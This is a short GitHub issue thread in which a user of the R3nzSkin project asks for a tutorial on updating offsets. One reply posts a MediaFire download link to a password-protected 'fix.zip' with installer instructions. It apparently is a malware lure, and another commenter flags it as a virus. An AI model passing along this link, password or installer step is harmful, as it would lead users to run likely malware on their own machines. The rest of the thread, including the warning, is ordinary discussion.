### ISSUE TITLE
[request] finding and changing offsets tutorial

### ISSUE THREAD

**Issue by CRCslingshot** [hydy100/R3nzSkin#123]
can we have a vid or an article here to explain how self-updating the program works? I would love to contribute in updating this program if the repo owner ever got lazy or didn't have time.  I remember the main had a tutorial somewhere but since it is archived I can't view it anymore. 

much love ♥

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ilyablaut** [comment]
its a virus on top of my comment dont use it

**Comment by CRCslingshot** [comment]
yeah I asked for an explanation not a link to a sus mediafire file xD didn't click it even.
